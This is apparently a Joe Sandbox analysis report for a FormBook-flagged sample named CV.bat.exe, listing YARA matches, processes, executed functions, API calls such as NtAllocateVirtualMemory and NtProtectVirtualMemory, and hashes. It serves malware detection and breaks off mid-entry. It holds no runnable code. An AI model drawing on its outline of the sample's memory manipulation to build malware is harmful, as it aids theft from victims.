Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: CV.bat.exePID: 6056, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	137
Total number of Limit Nodes:	10

Executed Functions

Function 04E4AED8 Relevance: .6, Instructions: 586COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.310916583.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e40000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b99a7b000c9996777d02640398d02dbfd128acdc79a10e6aa4b8210803fb8cc
Instruction ID: ecb397f3dec01d5fe79883e775a5806b0815204aa80b20eb8d791d8aeeda3476
Opcode Fuzzy Hash: 9b99a7b000c9996777d02640398d02dbfd128acdc79a10e6aa4b8210803fb8cc
Instruction Fuzzy Hash: 69525B34A002058FDB14DF64C844B99B7F2FF89318F2586A9D5586F3A2DBB5AD82CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00EBBEF8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00EBBF68
GetCurrentThread.KERNEL32 ref: 00EBBFA5
GetCurrentProcess.KERNEL32 ref: 00EBBFE2
GetCurrentThreadId.KERNEL32 ref: 00EBC03B

Strings

H, xrefs: 00EBC067

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID: Current$ProcessThread
String ID: H
API String ID: 2063062207-1105002124
Opcode ID: 0fbce91509a86c9b1e68f51cc98cb1c44f150c856906d7d525ccbcf58c5a0421
Instruction ID: bda74e19aba1fdef426e382a1ea8bc3c8c1fc67f7bef183eba6070933f3a99e0
Opcode Fuzzy Hash: 0fbce91509a86c9b1e68f51cc98cb1c44f150c856906d7d525ccbcf58c5a0421
Instruction Fuzzy Hash: 4F5177B0E042498FDB10CFA9D949BEEBBF5AF89304F248469E109B7390D7746944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00EBBF08 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00EBBF68
GetCurrentThread.KERNEL32 ref: 00EBBFA5
GetCurrentProcess.KERNEL32 ref: 00EBBFE2
GetCurrentThreadId.KERNEL32 ref: 00EBC03B

Strings

H, xrefs: 00EBC067

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID: Current$ProcessThread
String ID: H
API String ID: 2063062207-1105002124
Opcode ID: c6b52d10ab5fe25f61aad357f595d61ef073c843bbad0d6eba6e3c46074160db
Instruction ID: 59859dd648297c9f529bf0294c0b276fa8787dfdea7dfc6a8dde0c83039f5273
Opcode Fuzzy Hash: c6b52d10ab5fe25f61aad357f595d61ef073c843bbad0d6eba6e3c46074160db
Instruction Fuzzy Hash: CA5142B0E002098FDB10CFAAD948BEEBBF5AF88304F248469E019B7390D7746844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00EB9C10 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00EB9E56

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 72c15b3946d2ab0c6bbdc4c7750f1828030d47bb6b575db9c66021c31bd831bd
Instruction ID: b150fa5b6c1ad9de63d0899c9db6dbe35c044ad7b6e1305129da12b1a9906058
Opcode Fuzzy Hash: 72c15b3946d2ab0c6bbdc4c7750f1828030d47bb6b575db9c66021c31bd831bd
Instruction Fuzzy Hash: 85711270A00B058FD724DF6AD4417ABBBF5BF88304F108929D68AE7A51DB75E8058F91

Uniqueness

Uniqueness Score: -1.00%

Function 00EB565C Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00EB5719

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3598a293456bc3d6b7653cab79b4235975dc866fa723f8e6600ce5d0dce2429a
Instruction ID: 9ead45682431023229fd17f041ea24d961b849d21464bb770b89667f0fee4268
Opcode Fuzzy Hash: 3598a293456bc3d6b7653cab79b4235975dc866fa723f8e6600ce5d0dce2429a
Instruction Fuzzy Hash: CE4126B2D04628CFDB14CFA9C884BDEBBB5BF88304F24846AD508BB255DB755946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00EB41AC Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00EB5719

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c8874a6224f740cf9b5ee6bd1cbe6601a6794a074f5de323fff5d71e152c6cb1
Instruction ID: 31833b6dd13d1381b1d239e67f292b46c4207156397402c63d117d70285cf530
Opcode Fuzzy Hash: c8874a6224f740cf9b5ee6bd1cbe6601a6794a074f5de323fff5d71e152c6cb1
Instruction Fuzzy Hash: F341F5B1D04628CBDB14DFA9C844BCEBBB5BF48304F24846AD509BB251DB755945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04E47A18 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 04E47AAF

Memory Dump Source

Source File: 00000000.00000002.310916583.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e40000_CV.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 9ff0f6b5f246ce808fd1636e88f2658679e233dd876c95888d567d495d4b27ff
Instruction ID: 7c3d2b7568e1706e8b7da87bb725fd426cc120b2badc346c6817b58d4f84898f
Opcode Fuzzy Hash: 9ff0f6b5f246ce808fd1636e88f2658679e233dd876c95888d567d495d4b27ff
Instruction Fuzzy Hash: 3A21D4B5D002099FDB10CF99D884ADEFBF5FB48324F14842AE919A7350D774A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EBC129 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EBC1B7

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3a5658435d305e5e48f86e32482d23172af7ae42a384fa334b24176a4db6cc48
Instruction ID: 473a1af5558afba40675d5cbc93a63340e8b10f4047b85a970c197d7c4432ee1
Opcode Fuzzy Hash: 3a5658435d305e5e48f86e32482d23172af7ae42a384fa334b24176a4db6cc48
Instruction Fuzzy Hash: ED21E3B5901249DFDB10CFA9D884BDEBBF4EB48324F14841AE914B7311D378A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EBC130 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EBC1B7

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2275019a7793a665fb82041d043404a1d948237c00546d550a34c330e7649e0c
Instruction ID: f2310aa1cf800dc95cc6efd5e418f906fa5db78b2e3248b0a34f320f23e28205
Opcode Fuzzy Hash: 2275019a7793a665fb82041d043404a1d948237c00546d550a34c330e7649e0c
Instruction Fuzzy Hash: 1821C4B59012199FDB10CF9AD984ADEBBF8FB48324F14841AE914B7350D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EBA070 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00EB9ED1,00000800,00000000,00000000), ref: 00EBA0E2

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b880a9ab4d123d66e2b66d2697c7a2511e21512a7f0142f284eeca35abfa592e
Instruction ID: a80c7f44f20b0aebbe134764c1054f2d5eca1b6d76b8940fddc70aeaa8e98997
Opcode Fuzzy Hash: b880a9ab4d123d66e2b66d2697c7a2511e21512a7f0142f284eeca35abfa592e
Instruction Fuzzy Hash: 251136B28042098FDF10CF9AD844BEFFBF4AB98314F14842AD519B7200C775A949CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB9660 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00EB9ED1,00000800,00000000,00000000), ref: 00EBA0E2

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 24f4305eefe795d5dfeea4dd0323c4eca918d7fd74a7698eb41481f5b02a3a18
Instruction ID: 55439d447489a6f0b15d9b4d992d809e289ba16b0fcc2bdfb2e28bc4d2cf85e1
Opcode Fuzzy Hash: 24f4305eefe795d5dfeea4dd0323c4eca918d7fd74a7698eb41481f5b02a3a18
Instruction Fuzzy Hash: 591117B29042099FDB10DF9AD444BDFFBF4EB88314F14842AE515B7200C775A949CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB9DF0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00EB9E56

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c61ce141f949ef32f356616c5ced9df7a35264b3df4c2f43627b83199c3452af
Instruction ID: b1ffbe64e54f0b8afd24f4f3ef050c4d1cd62dafcdc541de1b6a244d280f6226
Opcode Fuzzy Hash: c61ce141f949ef32f356616c5ced9df7a35264b3df4c2f43627b83199c3452af
Instruction Fuzzy Hash: E711E0B6C002498FDB10CF9AD444BDFFBF8AB89324F14842AD529B7600D379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.299753852.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bbd000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6186d842795143e48969ec2548c6f6d749f7e513ea4baa28e87acb5de8269d6d
Instruction ID: fc4a83ee1014463940fa3fa0d4dce2b816debfcc593a3aae924ed256e6567d8c
Opcode Fuzzy Hash: 6186d842795143e48969ec2548c6f6d749f7e513ea4baa28e87acb5de8269d6d
Instruction Fuzzy Hash: 41216A71504240DFDB10CF10C8C0B7ABFA5FB98318F20C5A9E9050B206D3BAD806CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.299841641.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bcd000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f597ebf89507951eb9fbe19bd79126ed82a4bb34efe149a19d2520fdf3535363
Instruction ID: 05bbf00a031c15d65ebc602ecb9326a6bcf003ddc1013fc431a905ee6758b4b5
Opcode Fuzzy Hash: f597ebf89507951eb9fbe19bd79126ed82a4bb34efe149a19d2520fdf3535363
Instruction Fuzzy Hash: 75212279608200DFDB10CF18D8D0F26BBA5FB88324F20C5BDE90A4B246C37AD807CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.299841641.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bcd000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dc5628d82bc3b0d8cd1a0b8a2196a680477788e9014b2cade55ac6438f4677b
Instruction ID: 9d9d7201d7b8618e38dbb658b0de27ab3cfb55dfdbd32c13d2d96c0c9866a2a4
Opcode Fuzzy Hash: 9dc5628d82bc3b0d8cd1a0b8a2196a680477788e9014b2cade55ac6438f4677b
Instruction Fuzzy Hash: 5B21F5B9608204DFDB01DF50D9C0F26BBA5FB84314F24C5BDE9094F246C776D846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.299841641.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bcd000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9291a68a5a1f6dbdf03f5447904e8b316f5d89467ef0b15736b0cc62ccfb17f5
Instruction ID: 1ddb8a0c094c06bf407ea944e79637994f772f79d3628b8e77b7d26d61901149
Opcode Fuzzy Hash: 9291a68a5a1f6dbdf03f5447904e8b316f5d89467ef0b15736b0cc62ccfb17f5
Instruction Fuzzy Hash: 3421C9755093808FCB12CF24D594B15BF71EB45314F28C5EED8458B657C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.299753852.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bbd000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd24c802d1f0944178af6fc850af7be5c5916ca1db69a1141699bdd4730e3d2e
Instruction ID: 8cb053b44db7baf1d276ef282e087056979015c5350372ae0c02429093b5d19c
Opcode Fuzzy Hash: cd24c802d1f0944178af6fc850af7be5c5916ca1db69a1141699bdd4730e3d2e
Instruction Fuzzy Hash: EB11D376504280CFCB11CF10D5C4B66BFB1FB94324F24C6AAD8450B656D37AD856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.299841641.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bcd000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4fd11be75d3965515b4152d8e08f00d09ff848862d85c063b28ddaa4755cdb2
Instruction ID: 00c3a9f50aaf090848f7892d4864fc48ef3daa7febfb6cca757537624ef1033c
Opcode Fuzzy Hash: b4fd11be75d3965515b4152d8e08f00d09ff848862d85c063b28ddaa4755cdb2
Instruction Fuzzy Hash: C3115B7A904280DFDB15CF14D9C4B15BBB1FB84324F28C6AED8494F656C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.299753852.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bbd000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f54efe3785a4bc0b9b7d1733fa24a93eb7f0b5677e065d8358227223debbcddc
Instruction ID: 31879cd036da0e1b62fe13961f8094e7a90cee8de302f0bbaccc91ac0b600b83
Opcode Fuzzy Hash: f54efe3785a4bc0b9b7d1733fa24a93eb7f0b5677e065d8358227223debbcddc
Instruction Fuzzy Hash: 3C0184714082809BE7104E17CDC4BF6BBD8EB41364F18859AEA045B686EBBD9C44C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.299753852.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bbd000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a89f329e65ba3afa301c8ef5dfac893cce2e283fe26f72615e81191e0dbff2cf
Instruction ID: dca64ca0a609ef8238a4c87ca9290bfbf38ec37abed0f0e710cd669eb1bd94b2
Opcode Fuzzy Hash: a89f329e65ba3afa301c8ef5dfac893cce2e283fe26f72615e81191e0dbff2cf
Instruction Fuzzy Hash: 09F0C2714042849BE7108E16CC88BB2FFD8EB81334F18C49AED081B28AD7B99C44CAB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00EBE9F0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceb8e04c35cc6d2831ab68ecdb220348f65c6e1d21edb1c6f4a8791110e2deaa
Instruction ID: 5f4360e4d43f8d8a9bf20e66a3b6224710b9875e5b1e66140ef812c54f95ecd5
Opcode Fuzzy Hash: ceb8e04c35cc6d2831ab68ecdb220348f65c6e1d21edb1c6f4a8791110e2deaa
Instruction Fuzzy Hash: BE1290B2412F668EE3109F66FD985893BA1F785329B91430BD2613EAF1D7B8114ECF44

Uniqueness

Uniqueness Score: -1.00%

Function 00EBCA4C Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3e14928d3efea395e4f2b42bfabc7ce3d119b9f15a38cfa92b3dfe82b96c33
Instruction ID: cfbd8402bec7dcd7603bb9bccbc40bda836c02a82a3818be5ec5cbaa2344ba4d
Opcode Fuzzy Hash: bb3e14928d3efea395e4f2b42bfabc7ce3d119b9f15a38cfa92b3dfe82b96c33
Instruction Fuzzy Hash: 1AA17D32E0021ACFCF15DFA5D8845DEBBF2FF85304B25956AE905BB261EB71A905CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00EBE9E3 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301852889.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16713a851afe6368dda76c54730a1e8b7fb7eb82bafe10cd4880ae5d4bafd4f5
Instruction ID: 9e1380b353d4138e286fdc854df0152e351598e4a71ba5d9505703038fbc080e
Opcode Fuzzy Hash: 16713a851afe6368dda76c54730a1e8b7fb7eb82bafe10cd4880ae5d4bafd4f5
Instruction Fuzzy Hash: 21C107B2412B668EE710DF66FC985893BA1FB85328B51831BD2617B6F0D7B8104ECF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CV.bat.exePID: 5060, Parent PID: 6056COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	2.4%
Signature Coverage:	4.7%
Total number of Nodes:	660
Total number of Limit Nodes:	75

Executed Functions

Function 004012A3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Er(, xrefs: 00401383
Er(, xrefs: 00401350
Er(, xrefs: 0040138A

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID:
String ID: Er($ Er($ Er(
API String ID: 0-3086951384
Opcode ID: 5e75f2a575d6fc1a03cea85626fa40ca5efbb421fa0ba352c40602804644abe5
Instruction ID: 49c4e58eeb451055d7d26c3399437c6f0e6e618acf050c80d0e0cac8fad0b124
Opcode Fuzzy Hash: 5e75f2a575d6fc1a03cea85626fa40ca5efbb421fa0ba352c40602804644abe5
Instruction Fuzzy Hash: CD9134B1C1036CDADF10CFE4CC81AEEBBB4BF99304F20426AE504BA291E7741685CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004012B4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C

Strings

Er(, xrefs: 00401383
Er(, xrefs: 00401350
Er(, xrefs: 0040138A

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: Er($ Er($ Er(
API String ID: 2706961497-3086951384
Opcode ID: df408c73ebf78a5713e4e073d58859ebaa3d45b249ee9b67c41f256c175e3867
Instruction ID: a480be198bf7b325f1dd9094273ee66d223163cd03b4798760d7b7a7bc25a90a
Opcode Fuzzy Hash: df408c73ebf78a5713e4e073d58859ebaa3d45b249ee9b67c41f256c175e3867
Instruction Fuzzy Hash: A1812371C1036DDADF10CFE4C881AEEBBB4BF99314F20536AE504BA291EB741685CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041E107 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E140

Strings

HD@, xrefs: 0041E123, 0041E12F

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: HD@
API String ID: 2167126740-1661062907
Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
Instruction ID: 1bbea0d6684aa38b9cba9bc3d52488313a85d4e06c8950b3cee914a455dff4e2
Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
Instruction Fuzzy Hash: 13F01CB5200218ABCB14DF89DC41EDB77ADAF88754F018109BE0997241C630F810CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E183 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E140

Strings

HD@, xrefs: 0041E123, 0041E12F

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: HD@
API String ID: 2167126740-1661062907
Opcode ID: be15ad6741368c40b601e51ca25a83412e575054858a3cb12cda629bf94765ce
Instruction ID: 79fb140efcd819c5c46f2b55ce010033506e3df188fd2abcc5036b627baf314d
Opcode Fuzzy Hash: be15ad6741368c40b601e51ca25a83412e575054858a3cb12cda629bf94765ce
Instruction Fuzzy Hash: 26E0E6B52001096BCB04DF9ADC41CDB77ADEF8D3147108509FD4D93201C635E851CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 004014E9 Relevance: 1.5, APIs: 1, Instructions: 48
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C

Memory Dump Source

Source File: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_401000_CV.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 371faba62051234f7938c8126ee73b452853f95b8d80de4094dda5e991942a11
Instruction ID: 3908bdd51f68db1ea66282c296f95591c1bac43f4dd34ecde5f56e07dd72b49d
Opcode Fuzzy Hash: 371faba62051234f7938c8126ee73b452853f95b8d80de4094dda5e991942a11
Instruction Fuzzy Hash: 8111C271C04168AEEF24CAB4DC41ADEBBB8EF80328F70026ED915B21D1D33519069F80

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF27 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

